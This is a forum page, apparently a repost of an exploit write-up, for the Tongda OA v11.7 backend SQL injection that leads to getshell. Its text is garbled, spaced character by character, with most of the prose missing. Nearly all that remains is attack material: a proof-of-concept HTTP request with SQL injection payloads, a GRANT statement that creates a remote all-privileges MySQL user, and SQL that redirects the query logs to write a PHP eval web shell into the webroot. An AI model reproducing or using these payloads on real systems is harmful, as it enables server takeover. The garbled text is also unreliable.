搜索

[728] 2020-12-23_通达OAv11.7后台SQL注入到getshell

文档创建者:s7ckTeam
浏览次数:49
最后更新:2025-01-16
2020-12-23_通达OAv11.7后台SQL注入到getshell O A   v 1 1 . 7 S Q L g e t s h e l l     b g b i n g   2 0 2 0 - 1 2 - 2 3 O A v 1 1 . 7 h t t p s : / / c d n d o w n . t o n g d a 2 0 0 0 . c o m / o a / 2 0 1 9 / T D O A 1 1 . 7 . e x e 访 h t t p : / / l o c a l h o s t / a d m i n
P O C G E T   / g e n e r a l / h r / m a n a g e / q u e r y / d e l e t e _ c a s c a d e . p h p ? c o n d i t i o n _ c a s c a d e = s e l e c t   i f ( ( s u b s t r ( u s e r ( ) , 1 , 1 ) = H o s t :   1 9 2 . 1 6 8 . 7 7 . 1 3 7 U s e r - A g e n t :   M o z i l l a / 5 . 0   ( W i n d o w s   N T   1 0 . 0 ;   W O W 6 4 ;   r v : 5 2 . 0 )   G e c k o / 2 0 1 0 0 1 0 1   F i r e f o x / 5 2 . 0 A c c e p t :   * / * A c c e p t - L a n g u a g e :   z h - C N , z h ; q = 0 . 8 , e n - U S ; q = 0 . 5 , e n ; q = 0 . 3 X - R e q u e s t e d - W i t h :   X M L H t t p R e q u e s t R e f e r e r :   h t t p : / / 1 9 2 . 1 6 8 . 7 7 . 1 3 7 / g e n e r a l / i n d e x . p h p ? i s I E = 0 & m o d i f y _ p w d = 0 C o o k i e :   P H P S E S S I D = e b p j t m 5 t q h 5 t v i d a 5 k e b a 7 3 f r 0 ;   U S E R _ N A M E _ C O O K I E = a d m i n ;   O A _ U S E R _ I D = a d m i n ;   S I D _ 1 = D N T :   1 C o n n e c t i o n :   c l o s e c o n d i t i o n _ c a s c a d e 1 = 1 p a y l o a d 1 c o n d i t i o n _ c a s c a d e = s e l e c t   i f ( ( ( 1 = 1 ) ) , 1 , p o w e r ( 9 9 9 9 , 9 9 ) ) 1 = 2 p a y l o a d 2 c o n d i t i o n _ c a s c a d e = s e l e c t   i f ( ( ( 1 = 2 ) ) , 1 , p o w e r ( 9 9 9 9 , 9 9 ) )
a t 6 6 6 a b c A B C @ 1 2 3 g r a n t   a l l   p r i v i l e g e s   O N   m y s q l . *   T O   ' a t 6 6 6 ' @ ' % '   I D E N T I F I E D   B Y   ' a b c A B C @ 1 2 3 '   W I T H   G R A N T   O P T I O N N a v i c a t   P r e m i u m
s h e l l : s e l e c t   @ @ b a s e d i r ; s e t   g l o b a l   s l o w _ q u e r y _ l o g = o n ; s e t   g l o b a l   s l o w _ q u e r y _ l o g _ f i l e = ' C : / t o n g d a 1 1 . 7 / w e b r o o t / t e s t . p h p ' ; s e l e c t   ' < ? p h p   e v a l ( $ _ P O S T [ x ] ) ; ? > '   o r   s l e e p ( 1 1 ) ; : s e l e c t   @ @ b a s e d i r ; s e t   g l o b a l   g e n e r a l _ l o g   =   o n ; s e t   g l o b a l   g e n e r a l _ l o g _ f i l e   = ' C : / t o n g d a 1 1 . 7 / w e b r o o t / t e s t 2 . p h p ' ; s e l e c t   ' < ? p h p   e v a l ( $ _ P O S T [ t e s t 2 ] ) ; ? > ' ; s h o w   v a r i a b l e s   l i k e   ' % g e n e r a l % ' ;
使

回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理